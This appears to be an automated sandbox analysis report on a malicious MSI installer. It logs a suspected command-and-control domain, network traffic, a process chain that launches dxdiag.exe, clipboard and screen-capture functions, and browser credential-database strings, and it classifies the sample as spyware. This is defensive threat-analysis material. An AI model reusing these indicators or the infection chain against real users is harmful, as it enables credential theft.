Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/
Source: dxdiag.exe, 00000006.00000003.2258774051.0000000002982000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/%a
Source: dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/alS5
Source: dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/api
Source: dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apiQ
Source: dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apib
Source: dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apiuu
Source: dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/ce
Source: dxdiag.exe, 00000006.00000003.2217619969.0000000002985000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/d
Source: dxdiag.exe, 00000006.00000003.2274208940.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2280230391.0000000002988000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2279871689.000000000298F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2268687272.0000000002990000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2295091378.0000000002995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/ob:6_
Source: dxdiag.exe, 00000006.00000002.2308418613.0000000002995000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2304057412.0000000002995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/pi
Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: dxdiag.exe, 00000006.00000003.2218039986.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218128011.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: dxdiag.exe, 00000006.00000003.2242227992.0000000004A50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: dxdiag.exe, 00000006.00000003.2242227992.0000000004A50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: dxdiag.exe, 00000006.00000003.2242276188.0000000004B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: dxdiag.exe, 00000006.00000003.2242542138.00000000029AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49781 version: TLS 1.2

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 6_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

6_2_004303F0

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 6_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

6_2_004303F0

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 6_2_00431262 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

6_2_00431262

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5403ef.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI602.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI670.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6FE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI79B.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI839.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI982.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIACB.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIAEB.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI602.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_3_028FA4A4	6_3_028FA4A4
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00435870	6_2_00435870
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00415971	6_2_00415971
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00408920	6_2_00408920
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043CA10	6_2_0043CA10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040AAE0	6_2_0040AAE0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00420B10	6_2_00420B10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040E458	6_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043D400	6_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00425480	6_2_00425480
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00435530	6_2_00435530
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00438640	6_2_00438640
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043A7F4	6_2_0043A7F4
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004227B0	6_2_004227B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043D040	6_2_0043D040
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00414860	6_2_00414860
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00433875	6_2_00433875
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00425800	6_2_00425800
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00425820	6_2_00425820
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042683C	6_2_0042683C
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041D0C0	6_2_0041D0C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004230C0	6_2_004230C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004238F0	6_2_004238F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00403950	6_2_00403950
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040F116	6_2_0040F116
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040E122	6_2_0040E122
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040B124	6_2_0040B124
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004281C0	6_2_004281C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040D9D6	6_2_0040D9D6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042A9D5	6_2_0042A9D5
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004061E0	6_2_004061E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004181E9	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004231F6	6_2_004231F6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00405980	6_2_00405980
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00436980	6_2_00436980
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00414860	6_2_00414860
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043BA70	6_2_0043BA70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00412200	6_2_00412200
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00426A10	6_2_00426A10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00419219	6_2_00419219
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042AAC6	6_2_0042AAC6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004092D0	6_2_004092D0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042AAD7	6_2_0042AAD7
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004082F0	6_2_004082F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004362F0	6_2_004362F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041DA80	6_2_0041DA80
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042AA8A	6_2_0042AA8A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00438A90	6_2_00438A90
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00427365	6_2_00427365
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040FB71	6_2_0040FB71
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00404300	6_2_00404300
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041BB20	6_2_0041BB20
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041C330	6_2_0041C330
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00436BE4	6_2_00436BE4
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00402B90	6_2_00402B90
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00407450	6_2_00407450
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00404C50	6_2_00404C50
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00434463	6_2_00434463
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00415460	6_2_00415460
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00434C70	6_2_00434C70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00427C0F	6_2_00427C0F
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041D4C0	6_2_0041D4C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043CCF0	6_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041EC80	6_2_0041EC80
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042E480	6_2_0042E480
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00416CBD	6_2_00416CBD
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042456F	6_2_0042456F
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00421D73	6_2_00421D73
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00438D70	6_2_00438D70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00417D74	6_2_00417D74
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00424DD0	6_2_00424DD0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00405E40	6_2_00405E40
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041BE71	6_2_0041BE71
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00406670	6_2_00406670
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040EE70	6_2_0040EE70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041CE00	6_2_0041CE00
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00434ED0	6_2_00434ED0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004216E0	6_2_004216E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043B6F0	6_2_0043B6F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00415FA1	6_2_00415FA1
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00417742	6_2_00417742
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00402F50	6_2_00402F50
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041676A	6_2_0041676A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00419710	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00411712	6_2_00411712
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0040C72B	6_2_0040C72B
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00409730	6_2_00409730
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_004277E0	6_2_004277E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0043B7E0	6_2_0043B7E0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042779B	6_2_0042779B
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_00415FA1	6_2_00415FA1
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0041A7A0	6_2_0041A7A0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 6_2_0042456F	6_2_0042456F

Source: Joe Sandbox View

Dropped File: C:\Windows\Installer\MSI602.tmp D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: String function: 00407FE0 appears 50 times
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: String function: 00414850 appears 77 times

Source: msit.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs msit.msi
Source: msit.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs msit.msi
Source: msit.msi	Binary or memory string: OriginalFilenamePrereq.dllF vs msit.msi

Source: classification engine

Classification label: mal100.troj.spyw.evad.winMSI@10/25@1/1

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 6_2_00435870 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

6_2_00435870

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\msit

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF76783C6014623E29.TMP

Jump to behavior

Source: C:\Windows\Installer\MSIAEB.tmp

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dxdiag.exe, 00000006.00000003.2218290971.0000000004A67000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2230387144.0000000004A5F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2218812673.0000000004A49000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: msit.msi	Virustotal: Detection: 57%
Source: msit.msi	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\msit.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DE
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIAEB.tmp "C:\Windows\Installer\MSIAEB.tmp"
Source: C:\Windows\Installer\MSIAEB.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\Installer\MSIAEB.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DE	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIAEB.tmp "C:\Windows\Installer\MSIAEB.tmp"	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\Installer\MSIAEB.tmp	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
